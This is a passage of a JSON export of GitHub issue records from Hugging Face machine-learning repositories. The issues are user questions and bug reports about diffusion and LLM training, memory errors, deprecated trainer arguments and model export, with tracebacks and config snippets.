", "url": "https://github.com/huggingface/diffusers/issues/9174", "state": "closed", "labels": [ "quantization" ], "created_at": "2024-08-14T08:05:34Z", "updated_at": "2024-10-21T04:42:46Z", "comments": 15, "user": "sayakpaul" }, { "repo": "huggingface/diffusers", "number": 9172, "title": "why rebuild a vae in inference stage? ", "body": "Thanks for ur effort for diffusion model. \r\n\r\nI want to know why we need to rebuild a vae in inference stage. I think it will introduce extra GPU cost.\r\nhttps://github.com/huggingface/diffusers/blob/a85b34e7fdc0a5fceb11aa0fa6199bd9afaca396/examples/text_to_image/train_text_to_image_sdxl.py#L1217C16-L1223C24\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/9172", "state": "open", "labels": [ "stale" ], "created_at": "2024-08-14T05:52:38Z", "updated_at": "2024-11-14T15:03:55Z", "comments": 2, "user": "WilliammmZ" }, { "repo": "huggingface/candle", "number": 2413, "title": "How to load multiple safetensors with json format", "body": "For such a task:\r\n\r\nhttps://huggingface.co/black-forest-labs/FLUX.1-dev/tree/main/transformer\r\n\r\nhow should safetensors be loaded?\r\n\r\n", "url": "https://github.com/huggingface/candle/issues/2413", "state": "open", "labels": [], "created_at": "2024-08-14T04:50:37Z", "updated_at": "2025-06-11T19:05:05Z", "user": "oovm" }, { "repo": "huggingface/diffusers", "number": 9170, "title": "sdxl and contronet must has a GPU memory more than 36G?", "body": "### Describe the bug\n\nhttps://github.com/huggingface/diffusers/blob/15eb77bc4cf2ccb40781cb630b9a734b43cffcb8/src/diffusers/pipelines/controlnet/pipeline_controlnet_sd_xl.py\r\nline73---line113\r\nI run the demo with 24G GPU, then OOM everytime.\r\nso I must run SDXl with 48G?\r\n\r\n\r\n@yiyixuxu @sayakpaul @DN6 tks\n\n### Reproduction\n\nFile \"/root/miniconda3/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1150, in convert\r\n return t.to(device, dtype if t.is_floating_point() or t.is_complex() else None, non_blocking)\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\ntorch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 26.00 MiB. GPU 0 has a total capacity of 23.65 GiB of which 7.56 MiB is free. Process 3431486 has 18.91 GiB memory in use. Process 3081991 has 4.72 GiB memory in use. Of the allocated memory 4.09 GiB is allocated by PyTorch, and 171.75 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation. See documentation for Memory Management (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables)\n\n### Logs\n\n_No response_\n\n### System Info\n\n0.28?\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9170", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-14T01:46:35Z", "updated_at": "2024-11-13T08:49:22Z", "comments": 3, "user": "henbucuoshanghai" }, { "repo": "huggingface/trl", "number": 1927, "title": "how to use kto_pair loss in the latest version ?", "body": "I can see that kto_pair losstype is no longer available in the latest version of dpo trainer. You suggest to use ktotrainer instead. 
\r\nBut kto_pair loss worked much better than kto_trainer on my dataset, so how do I continue to use kto_pair if I'm using the latest version of the trl library?\r\nthanks a lot!", "url": "https://github.com/huggingface/trl/issues/1927", "state": "closed", "labels": [ "\ud83c\udfcb DPO", "\ud83c\udfcb KTO" ], "created_at": "2024-08-13T15:59:25Z", "updated_at": "2024-10-20T16:56:21Z", "user": "vincezengqiang" }, { "repo": "huggingface/autotrain-advanced", "number": 728, "title": "[BUG] Deprecated positional argument(s) used in SFTTrainer, please use the SFTConfig to set these arguments instead. How to mitigate this?", "body": "### Prerequisites\r\n\r\n- [X] I have read the [documentation](https://hf.co/docs/autotrain).\r\n- [X] I have checked other issues for similar problems.\r\n\r\n### Backend\r\n\r\nLocal\r\n\r\n### Interface Used\r\n\r\nCLI\r\n\r\n### CLI Command\r\n\r\n```\r\n!autotrain --config path-to.yml\r\n```\r\n\r\n```\r\ntask: llm-sft\r\nbase_model: teknium/OpenHermes-2.5-Mistral-7B\r\nproject_name: XXX\r\nlog: none\r\nbackend: local\r\n\r\ndata:\r\n path: /content\r\n train_split: train\r\n valid_split: null\r\n chat_template: null\r\n column_mapping:\r\n text_column: text\r\n\r\nparams:\r\n block_size: 256\r\n model_max_length: 512\r\n epochs: 1\r\n batch_size: 2\r\n lr: 3e-5\r\n peft: true\r\n quantization: int4\r\n target_modules: all-linear\r\n padding: right\r\n optimizer: adamw_torch\r\n scheduler: cosine\r\n gradient_accumulation: 1\r\n mixed_precision: none\r\n unsloth: true\r\n lora_r: 16\r\n lora_alpha: 16\r\n lora_dropout: 0\r\n\r\nhub:\r\n username: abc\r\n token: hf_XXX\r\n push_to_hub: false\r\n```\r\n\r\n### UI Screenshots & Parameters\r\n\r\n_No response_\r\n\r\n### Error Logs\r\n\r\n```\r\nLoading checkpoint shards: 100% 2/2 [01:21<00:00, 40.56s/it]\r\nINFO | 2024-08-13 04:46:20 | autotrain.trainers.clm.utils:get_model:666 - model dtype: torch.float16\r\nINFO | 2024-08-13 04:46:20 | autotrain.trainers.clm.train_clm_sft:train:37 - creating trainer\r\n/usr/local/lib/python3.10/dist-packages/huggingface_hub/utils/_deprecation.py:100: FutureWarning: Deprecated argument(s) used in '__init__': dataset_text_field, max_seq_length, packing. Will not be supported from version '1.0.0'.\r\n\r\nDeprecated positional argument(s) used in SFTTrainer, please use the SFTConfig to set these arguments instead.\r\n warnings.warn(message, FutureWarning)\r\n/usr/local/lib/python3.10/dist-packages/trl/trainer/sft_trainer.py:192: UserWarning: You passed a `packing` argument to the SFTTrainer, the value you passed will override the one in the `SFTConfig`.\r\n warnings.warn(\r\n/usr/local/lib/python3.10/dist-packages/trl/trainer/sft_trainer.py:280: UserWarning: You passed a `max_seq_length` argument to the SFTTrainer, the value you passed will override the one in the `SFTConfig`.\r\n warnings.warn(\r\n/usr/local/lib/python3.10/dist-packages/trl/trainer/sft_trainer.py:318: UserWarning: You passed a `dataset_text_field` argument to the SFTTrainer, the value you passed will override the one in the `SFTConfig`.\r\n warnings.warn(\r\n```\r\n\r\n### Additional Information\r\n\r\nI am not sure why this pops up. I know this is just a UserWarning and model is able to fine-tune ok, but is anything being affected? 
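On the warning in autotrain-advanced #728 above: per the messages, the positionally passed values still take effect and override the config, so the fine-tune itself is unaffected; the forward-compatible pattern is to move those arguments onto `SFTConfig`. A sketch assuming a trl version that ships `SFTConfig` (`train_dataset` is a placeholder dataset with a `text` column):

```python
from trl import SFTConfig, SFTTrainer

# The three deprecated kwargs now live on the config object.
config = SFTConfig(
    output_dir="sft-out",
    dataset_text_field="text",
    max_seq_length=512,
    packing=False,
    per_device_train_batch_size=2,
    num_train_epochs=1,
)

trainer = SFTTrainer(
    model="teknium/OpenHermes-2.5-Mistral-7B",  # model id from the issue config
    args=config,
    train_dataset=train_dataset,  # placeholder: a dataset with a "text" column
)
trainer.train()
```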
", "url": "https://github.com/huggingface/autotrain-advanced/issues/728", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-13T05:00:10Z", "updated_at": "2024-08-13T12:31:19Z", "user": "jackswl" }, { "repo": "huggingface/diffusers", "number": 9164, "title": "the dog example of train_dreambooth_lora_flux.py can not convergence", "body": "### Describe the bug\r\n\r\n```\r\nexport MODEL_NAME=\"black-forest-labs/FLUX.1-dev\"\r\nexport INSTANCE_DIR=\"dog\"\r\nexport OUTPUT_DIR=\"trained-flux-lora\"\r\n\r\naccelerate launch train_dreambooth_lora_flux.py \\\r\n --pretrained_model_name_or_path=$MODEL_NAME \\\r\n --instance_data_dir=$INSTANCE_DIR \\\r\n --output_dir=$OUTPUT_DIR \\\r\n --mixed_precision=\"bf16\" \\\r\n --instance_prompt=\"a photo of sks dog\" \\\r\n --resolution=512 \\\r\n --train_batch_size=1 \\\r\n --gradient_accumulation_steps=4 \\\r\n --learning_rate=1e-5 \\\r\n --report_to=\"wandb\" \\\r\n --lr_scheduler=\"constant\" \\\r\n --lr_warmup_steps=0 \\\r\n --max_train_steps=500 \\\r\n --validation_prompt=\"A photo of sks dog in a bucket\" \\\r\n --validation_epochs=25 \\\r\n --seed=\"0\" \\\r\n --push_to_hub\r\n``` \r\nI follow this command to train lora of flux-dev and download the dog-example from huggingFace, but this setting could not get better result, the loss is normal\r\n![image](https://github.com/user-attachments/assets/bc8b5795-cec6-46ac-994a-cb032af2f749)\r\n\r\n\r\nthe dog-example look like this:\r\n \r\n![alvan-nee-9M0tSjb-cpA-unsplash](https://github.com/user-attachments/assets/9bc554e4-3421-4b98-8a19-ab4bc6d3eca2)\r\n\r\nbut my result look like below:\r\n![dog0 (6)](https://github.com/user-attachments/assets/c9410c6b-1d80-4cef-8991-bc8a21195da1)\r\n\r\nand don't use the lora to generate image of the same prompt look like below:\r\n![dog0](https://github.com/user-attachments/assets/959cc08f-2531-45be-80d7-291800dc4ab0)\r\n\r\n\r\n\r\n### Reproduction\r\n\r\n```\r\nimport torch\r\nfrom diffusers import FluxPipeline\r\n\r\npipe = FluxPipeline.from_pretrained(\"/opt/ml/volume/default/aigc/project/FLUX.1-dev\",torch_dtype=torch.bfloat16)\r\npipe.enable_model_cpu_offload()\r\npipe.lora_state_dict(\"/opt/ml/volume/default/aigc/project/diffusers/examples/dreambooth/trained-flux-lora/checkpoint-500\")\r\nprompts = []\r\nprompts.append(\"an sks dog\")\r\nindex = 0\r\nfor prompt in prompts:\r\n image = pipe(\r\n prompt=prompt,\r\n num_inference_steps=20,\r\n guidance_scale=7.5,\r\n max_sequence_length=512,\r\n width=1152,\r\n height=768\r\n ).images[0]\r\n save_file = \"dog\"+str(index)+'.png'\r\n index+=1\r\n image.save(save_file)\r\n```\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nubuntu 20.04\r\n\r\n### Who can help?\r\n\r\n@sayakpaul @linoytsaban ", "url": "https://github.com/huggingface/diffusers/issues/9164", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-13T03:08:10Z", "updated_at": "2024-08-13T10:23:23Z", "comments": 7, "user": "chongxian" }, { "repo": "huggingface/text-embeddings-inference", "number": 380, "title": "How do i deploy to vertex ?", "body": "How do i deploy to vertex ? I think i saw some feature=google setting in code which supports compatibility with vertex . 
Please guide.", "url": "https://github.com/huggingface/text-embeddings-inference/issues/380", "state": "closed", "labels": [], "created_at": "2024-08-12T17:15:30Z", "updated_at": "2024-10-17T10:19:02Z", "user": "pulkitmehtaworkmetacube" }, { "repo": "huggingface/trl", "number": 1916, "title": "How to Add PEFT to PPO Trainer or PPO Config", "body": "I am trying to realize RLHF through PPO.\r\n\r\nMay I ask how can I realize PEFT in RLHF/PPO. I can see this parameter in DPOTrainer. However, I cannot see that in PPOTrainer.\r\n", "url": "https://github.com/huggingface/trl/issues/1916", "state": "closed", "labels": [ "\u2728 enhancement", "\ud83e\uddd2 good second issue", "\ud83c\udfcb PPO" ], "created_at": "2024-08-12T01:02:07Z", "updated_at": "2024-11-18T10:54:10Z", "user": "ZhichaoWang970201" }, { "repo": "huggingface/trl", "number": 1915, "title": "How to dpo llava?", "body": "Thank you for great work!\r\n\r\nI do dpo llava using raw `/trl/examples/scripts/dpo_visual.py` code by using a command\r\n`CUDA_VISIBLE_DEVICES=0 accelerate launch examples/scripts/dpo_visual.py --dataset_name HuggingFaceH4/rlaif-v_formatted --model_name_or_path llava-hf/llava-1.5-7b-hf --per_device_train_batch_size 1 --gradient_accumulation_steps 64 --dataset_num_proc 32 --output_dir dpo_llava --bf16 --torch_dtype bfloat16 --gradient_checkpointing --use_peft --lora_target_modules=all-linear`\r\nhowever I got a error such as \r\n\r\n> multiprocess.pool.RemoteTraceback: \r\n> \"\"\"\r\n> Traceback (most recent call last):\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/multiprocess/pool.py\", line 125, in worker\r\n> result = (True, func(*args, **kwds))\r\n> ^^^^^^^^^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/datasets/utils/py_utils.py\", line 678, in _write_generator_to_queue\r\n> for i, result in enumerate(func(**kwargs)):\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/datasets/arrow_dataset.py\", line 3522, in _map_single\r\n> example = apply_function_on_filtered_inputs(example, i, offset=offset)\r\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/datasets/arrow_dataset.py\", line 3421, in apply_function_on_filtered_inputs\r\n> processed_inputs = function(*fn_args, *additional_args, **fn_kwargs)\r\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/trl/trainer/dpo_trainer.py\", line 808, in tokenize_row\r\n> prompt_tokens = self.processor(prompt, images=images, add_special_tokens=False)\r\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n> TypeError: LlavaProcessor.__call__() got an unexpected keyword argument 'add_special_tokens'\r\n> \"\"\"\r\n> \r\n> The above exception was the direct cause of the following exception:\r\n> \r\n> Traceback (most recent call last):\r\n> File \"/trl/examples/scripts/dpo_visual.py\", line 178, in \r\n> trainer = DPOTrainer(\r\n> ^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/huggingface_hub/utils/_deprecation.py\", line 101, in inner_f\r\n> return f(*args, **kwargs)\r\n> ^^^^^^^^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/trl/trainer/dpo_trainer.py\", line 529, in __init__\r\n> train_dataset = train_dataset.map(self.tokenize_row, num_proc=self.dataset_num_proc, writer_batch_size=10)\r\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n> File 
\"/root/anaconda3/lib/python3.12/site-packages/datasets/arrow_dataset.py\", line 602, in wrapper\r\n> out: Union[\"Dataset\", \"DatasetDict\"] = func(self, *args, **kwargs)\r\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/datasets/arrow_dataset.py\", line 567, in wrapper\r\n> out: Union[\"Dataset\", \"DatasetDict\"] = func(self, *args, **kwargs)\r\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/datasets/arrow_dataset.py\", line 3253, in map\r\n> for rank, done, content in iflatmap_unordered(\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/datasets/utils/py_utils.py\", line 718, in iflatmap_unordered\r\n> [async_result.get(timeout=0.05) for async_result in async_results]\r\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/multiprocess/pool.py\", line 774, in get\r\n> raise self._value\r\n> TypeError: LlavaProcessor.__call__() got an unexpected keyword argument 'add_special_tokens'\r\n> Traceback (most recent call last):\r\n> File \"/root/anaconda3/bin/accelerate\", line 8, in \r\n> sys.exit(main())\r\n> ^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/accelerate/commands/accelerate_cli.py\", line 48, in main\r\n> args.func(args)\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/accelerate/commands/launch.py\", line 1106, in launch_command\r\n> simple_launcher(args)\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/accelerate/commands/launch.py\", line 704, in simple_launcher\r\n> raise subprocess.CalledProcessError(returncode=process.returncode, cmd=cmd)\r\n> subprocess.CalledProcessError: Command '['/root/anaconda3/bin/python', 'examples/scripts/dpo_visual.py', '--dataset_name', 'HuggingFaceH4/rlaif-v_formatted', '--model_name_or_path', 'llava-hf/llava-1.5-7b-hf', '--per_device_train_batch_size', '1', '--gradient_accumulation_steps', '64', '--dataset_num_proc', '32', '--output_dir', 'dpo_llava', '--bf16', '--torch_dtype', 'bfloat16', '--gradient_checkpointing', '--use_peft', '--lora_target_modules=all-linear']' returned non-zero exit status 1.\r\n\r\nIs there a solution?", "url": "https://github.com/huggingface/trl/issues/1915", "state": "closed", "labels": [], "created_at": "2024-08-11T00:57:38Z", "updated_at": "2024-08-11T01:23:16Z", "user": "ooooohira" }, { "repo": "huggingface/transformers.js", "number": 887, "title": "VSCode Interpolation", "body": "### Question\n\nI'm finding that VSCode is extremely slow when reading type definitions from the `@xenova/transformers` path. Is there anything I might be doing wrong? 
I've noticed that it uses JS comments to define the types instead of a type definition file, is the issue I am having a known issue with using that type of markup?", "url": "https://github.com/huggingface/transformers.js/issues/887", "state": "closed", "labels": [ "question" ], "created_at": "2024-08-11T00:08:30Z", "updated_at": "2024-08-25T01:55:36Z", "user": "lukemovement" }, { "repo": "huggingface/diffusers", "number": 9140, "title": "Diffusers model not working as good as repo ckpt model", "body": "Hi,\nWhen I try to run the models stable diffusion v1-5 or Instructpix2pix through the diffusers pipeline and use .from_pretrained() it downloads the models from hugging face and I'm using the code to run inference given in hugging face, the results are not good at all in the sense that there is still noise in the generated images.\n\nBut when I run these models using their GitHub repo code and ckpt models given by them the outputs are very good.\n\nIs there any solution to this or any other way to use the diffusers library pipeline.\n\nAlso the diffusers.StableDiffusionInstructPix2PixPipeline does not have .from_single_file() option.\n\nThank you \n", "url": "https://github.com/huggingface/diffusers/issues/9140", "state": "closed", "labels": [ "stale" ], "created_at": "2024-08-09T09:34:30Z", "updated_at": "2024-12-14T12:13:15Z", "comments": 6, "user": "kunalkathare" }, { "repo": "huggingface/diffusers", "number": 9136, "title": "IP adapter output on some resolutions suffers in quality?", "body": "### Describe the bug\n\nI am running IP adapter for 768x1344 which is one of the sdxl listed resolutions. I find that the output quality is much less than say regular 768x768 generations. I've attached sample images and code below. In this experiment 1080x768 seemed to get best output, but its not one of the supported resolutions @asomo\r\n\r\n\r\n![fridge_fg](https://github.com/user-attachments/assets/da1a2b42-f44e-40e1-967d-140f98f0f7da)\r\n![fridge_bg](https://github.com/user-attachments/assets/5e936097-7981-43d7-9ad3-216674738360)\r\n![fridge_canny](https://github.com/user-attachments/assets/996ff817-dd25-4206-b78b-cf1e264e5b7b)\r\n![fridge_mask](https://github.com/user-attachments/assets/46c4f2e2-7dd3-4edc-8051-56f9a8e0555b)\r\n![fridge_inv_mask](https://github.com/user-attachments/assets/c2c56fdd-507b-4e06-b263-0aa98a3224db)\r\n\n\n### Reproduction\n\n\r\nimport torch\r\nfrom diffusers import StableDiffusionXLPipeline, StableDiffusionXLImg2ImgPipeline, ControlNetModel, StableDiffusionXLControlNetPipeline, AutoencoderKL, UniPCMultistepScheduler\r\nfrom diffusers.image_processor import IPAdapterMaskProcessor\r\nfrom transformers import CLIPVisionModelWithProjection\r\nfrom controlnet_aux import AnylineDetector\r\nimport cv2\r\nimport numpy as np\r\nfrom PIL import Image, ImageOps\r\nfrom huggingface_hub import hf_hub_download\r\n\r\ndef create_controlnet_pipes(image_encoder=None)->StableDiffusionXLControlNetPipeline:\r\n ## get controlnet\r\n controlnet = ControlNetModel.from_pretrained(\r\n \"diffusers/controlnet-canny-sdxl-1.0\",\r\n torch_dtype=torch.float16,\r\n use_safetensors=True,\r\n )\r\n pipe = StableDiffusionXLPipeline.from_single_file(\r\n \"sdxl model path\", \r\n add_watermarker=False, \r\n torch_dtype=torch.float16, \r\n variant=\"fp16\", \r\n use_safetensors=True,\r\n image_encoder=image_encoder,\r\n )\r\n pipe = StableDiffusionXLControlNetPipeline(\r\n controlnet=controlnet,\r\n **pipe.components,\r\n add_watermarker=False,\r\n )\r\n pipe = pipe.to(\"cuda\")\r\n return 
pipe\r\n\r\n\r\ndef canny(image):\r\n image = np.array(image)\r\n low_threshold = 100\r\n high_threshold = 200\r\n image = cv2.Canny(image, low_threshold, high_threshold)\r\n image = image[:, :, None]\r\n image = np.concatenate([image, image, image], axis=2)\r\n return Image.fromarray(image)\r\n\r\n\r\nif __name__ == '__main__':\r\n ## crop different values like 0,0,1080,768 or 0,0,1280,768\r\n ref_image = Image.open('images/fridge_fg.png').crop((0,0,1344,768))\r\n bg_ref_image = Image.open('images/fridge_bg.png').crop((0,0,1344,768))\r\n\r\n mask_new = Image.open('images/fridge_mask.png').convert('L').crop((0,0,1344,768))\r\n inv_mask = Image.open('images/fridge_inv_mask.png').convert('L').crop((0,0,1344,768))\r\n processor = IPAdapterMaskProcessor()\r\n mask_fg = processor.preprocess([mask_new])\r\n mask_fg = mask_fg.reshape(1, mask_fg.shape[0], mask_fg.shape[2], mask_fg.shape[3])\r\n\r\n mask_bg = processor.preprocess([inv_mask])\r\n mask_bg = mask_bg.reshape(1, mask_bg.shape[0], mask_bg.shape[2], mask_bg.shape[3])\r\n\r\n canny_pil = Image.open('images/fridge_canny.png').crop((0,0,1344,768))\r\n \r\n image_encoder = CLIPVisionModelWithProjection.from_pretrained(\r\n \"h94/IP-Adapter\",\r\n subfolder=\"models/image_encoder\",\r\n torch_dtype=torch.float16\r\n )\r\n pipe = create_controlnet_pipes(image_encoder=image_encoder)\r\n pipe.load_ip_adapter(\"h94/IP-Adapter\", subfolder=\"sdxl_models\", weight_name=[\"ip-adapter-plus_sdxl_vit-h.safetensors\", \"ip-adapter-plus_sdxl_vit-h.safetensors\"], use_safetensors=True)\r\n scale_config_fg = {'down':1, 'mid':1, 'up':1}\r\n scale_config_bg = {\"down\":0.7, 'mid':0.7, 'up':0.7}\r\n pipe.set_ip_adapter_scale([scale_config_fg, scale_config_bg])\r\n\r\n for idx in range(5):\r\n outputs = pipe(\r\n prompt='kitchen scene',\r\n image=canny_pil,\r\n ip_adapter_image=[ref_image, bg_ref_image],\r\n negative_prompt=\"monochrome, lowres, bad anatomy, worst quality, low quality, fuzzy, blurry\",\r\n guidance_scale=5,\r\n num_inference_steps=30,\r\n controlnet_conditioning_scale=0.53,\r\n cross_attention_kwargs={\"ip_adapter_masks\": [mask_fg, mask_bg]},\r\n num_images_per_prompt=1\r\n # generator=generator,\r\n ).images\r\n for image in outputs:\r\n image.save()\r\n # image.save(f'output_plus/fridge_ar_ctrlnet_1280_plus_{idx}.png')\r\n print('done')\r\n pipe.unload_ip_adapter()\r\n\r\n\r\n\n\n### Logs\n\n_No response_\n\n### System Info\n\nv0.28.2 diffusers\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9136", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-08-09T06:36:39Z", "updated_at": "2024-09-14T15:03:17Z", "comments": 2, "user": "darshats" }, { "repo": "huggingface/transformers.js", "number": 885, "title": "TimeSformer on the web", "body": "### Question\n\nGlad to see this repo! If I want to use TimeSformer on the web, any suggestion or guide for it? Where can I learn from this repo or it's a totally different things? 
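Worth trying against diffusers #9136 above: preprocess the IP-adapter masks at the actual generation resolution so the downsampled attention masks line up with the latent grid instead of the masks' native size. A sketch reusing the variables from the issue's repro, with `height`/`width` passed to `preprocess` as the masking docs describe:

```python
from diffusers.image_processor import IPAdapterMaskProcessor

processor = IPAdapterMaskProcessor()

# Preprocess at the generation resolution (width 1344, height 768 here) so the
# masks are downsampled consistently with the latents.
mask_fg = processor.preprocess([mask_new], height=768, width=1344)
mask_fg = mask_fg.reshape(1, mask_fg.shape[0], mask_fg.shape[2], mask_fg.shape[3])

mask_bg = processor.preprocess([inv_mask], height=768, width=1344)
mask_bg = mask_bg.reshape(1, mask_bg.shape[0], mask_bg.shape[2], mask_bg.shape[3])

# Then pass them exactly as in the repro:
# cross_attention_kwargs={"ip_adapter_masks": [mask_fg, mask_bg]}
```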
Thanks in advance!", "url": "https://github.com/huggingface/transformers.js/issues/885", "state": "open", "labels": [ "question" ], "created_at": "2024-08-08T17:59:13Z", "updated_at": "2024-08-11T09:02:47Z", "user": "tomhsiao1260" }, { "repo": "huggingface/cookbook", "number": 163, "title": "Incorrect markdown table rendering in Colab in \"How to use Inference Endpoints to Embed Documents\"", "body": "There is an issue with the rendering of the Inference Endpoints table in Colab in [How to use Inference Endpoints to Embed Documents](https://huggingface.co/learn/cookbook/automatic_embedding_tei_inference_endpoints). Although the table correctly renders on HF cookbook webpage:\r\n\r\n\"image\"\r\n\r\nwhen opening with Colab with the upper \"Open in Colab\" button, the rows are rendered incorrectly:\r\n\r\n\"image\"\r\n", "url": "https://github.com/huggingface/cookbook/issues/163", "state": "closed", "labels": [], "created_at": "2024-08-08T11:16:40Z", "updated_at": "2024-08-08T16:22:48Z", "user": "sergiopaniego" }, { "repo": "huggingface/alignment-handbook", "number": 192, "title": "Constant training loss in the model adapter card", "body": "Hello,\r\n\r\nI could fine-tune a model using a small dataset and I see that the validation loss decreases, while the training loss remains the same in the model card.\r\n\r\nI don't think this is normal, even though the new task I try to teach the model is similar to what it already does, I think it should be able to learn from the dataset. I took a look at the trainer_state.json file created during the fine-tuning process and I saw that the training_loss for step 2 is different from the one displayed in the model card.\r\n\r\n**Results from model_card:**\r\n\r\n|Training Loss | Epoch \t| Step \t | Validation Loss|\r\n|-------|-------|-------|-------|\r\n|1.3185 \t | 1.0 \t| 1 |\t 1.4256|\r\n|1.3185 \t | 1.1429 \t| 2 \t | 1.3196|\r\n\r\n**Results from the trainer_state.json:**\r\n\r\n\"log_history\": [\r\n {\r\n \"epoch\": 1.0,\r\n \"grad_norm\": 1.1992276906967163,\r\n \"learning_rate\": 0.0002,\r\n \"loss\": 1.3185,\r\n \"step\": 1\r\n },\r\n {\r\n \"epoch\": 1.0,\r\n \"eval_loss\": 1.4256268739700317,\r\n \"eval_runtime\": 1.7474,\r\n \"eval_samples_per_second\": 1.145,\r\n \"eval_steps_per_second\": 0.572,\r\n \"step\": 1\r\n },\r\n {\r\n \"epoch\": 1.1428571428571428,\r\n \"eval_loss\": 1.3196333646774292,\r\n \"eval_runtime\": 1.552,\r\n \"eval_samples_per_second\": 1.289,\r\n \"eval_steps_per_second\": 0.644,\r\n \"step\": 2\r\n },\r\n {\r\n \"epoch\": 1.1428571428571428,\r\n \"step\": 2,\r\n \"total_flos\": 823612516859904.0,\r\n \"train_loss\": 0.7439389228820801,\r\n \"train_runtime\": 27.974,\r\n \"train_samples_per_second\": 0.5,\r\n \"train_steps_per_second\": 0.071\r\n }\r\n\r\nDoes the training loss remain the same, or is there a problem with the model card generation?\r\n\r\n\r\nHave a nice day!", "url": "https://github.com/huggingface/alignment-handbook/issues/192", "state": "closed", "labels": [], "created_at": "2024-08-08T09:35:40Z", "updated_at": "2024-08-08T13:29:00Z", "comments": 1, "user": "Michelet-Gaetan" }, { "repo": "huggingface/optimum", "number": 1985, "title": "Correct example to use TensorRT?", "body": "### System Info\r\n\r\n```shell\r\noptimum: 1.20.0\r\nos: ubuntu 20.04 with RTX 2080TI\r\npython: 3.10.14\r\n```\r\n\r\n\r\n### Who can help?\r\n\r\n@michaelbenayoun @JingyaHuang @echarlaix \r\n\r\n### Information\r\n\r\n- [X] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [X] An 
officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction (minimal, reproducible, runnable)\r\n\r\nI followed the doc [here](https://huggingface.co/docs/optimum/main/en/onnxruntime/usage_guides/gpu#tensorrtexecutionprovider). The below is my code:\r\n\r\n```python\r\nfrom transformers import AutoProcessor\r\nfrom optimum.onnxruntime import ORTModelForVision2Seq\r\n\r\nmodel = 'facebook/nougat-small'\r\nort_model = ORTModelForVision2Seq.from_pretrained(\r\n \"facebook/nougat-small\",\r\n export=True,\r\n provider=\"TensorrtExecutionProvider\",\r\n)\r\n\r\nassert ort_model.providers == [\"TensorrtExecutionProvider\", \"CUDAExecutionProvider\", \"CPUExecutionProvider\"]\r\nprocessor = AutoProcessor.from_pretrained(model)\r\nort_model.save_pretrained('./nougat-small-trt')\r\nprocessor.save_pretrained('./nougat-small-trt')\r\n```\r\n\r\nWhen running the code, the terminal looks like:\r\n\r\n```\r\n2024-08-08 16:31:02.881585368 [W:onnxruntime:Default, tensorrt_execution_provider.h:83 log] [2024-08-08 08:31:02 WARNING] onnx2trt_utils.cpp:403: One or more weights outside the range of INT32 was clamped\r\n```\r\n\r\nI waited for almost half an hour for exporting the model (RTX 2080TI). However, when I loaded it by the below code, it just repeated the same thing.\r\n\r\n```python\r\n session_options = ort.SessionOptions()\r\n session_options.graph_optimization_level = ort.GraphOptimizationLevel.ORT_ENABLE_ALL\r\n session_options.log_severity_level = 3\r\n trt_engine_cache = './nougat-small-trt-cache'\r\n os.makedirs(trt_engine_cache, exist_ok=True)\r\n provider_options = {\r\n 'trt_engine_cache_enable': True,\r\n 'trt_engine_cache_path': trt_engine_cache\r\n }\r\n self.model = ORTModelForVision2Seq.from_pretrained(\r\n model,\r\n provider='TensorrtExecutionProvider',\r\n provider_options=provider_options,\r\n session_options=session_options,\r\n )\r\n```\r\n\r\nTherefore, I want to know whether Optimum supports TensorRT or not. Or there is something wrong with the official doc to run TensorRT.\r\n\r\n### Expected behavior\r\n\r\nWhen loading the converted model by TensorRT, optimum should not repeat the converting process again.\r\n", "url": "https://github.com/huggingface/optimum/issues/1985", "state": "open", "labels": [ "bug" ], "created_at": "2024-08-08T08:46:14Z", "updated_at": "2024-08-29T11:24:35Z", "comments": 2, "user": "sherlcok314159" }, { "repo": "huggingface/diffusers", "number": 9127, "title": "flux.1-dev device_map didn't work", "body": "I try to use device_map to use multiple gpu's, but it not worked, how can I use all my gpus?\r\n", "url": "https://github.com/huggingface/diffusers/issues/9127", "state": "closed", "labels": 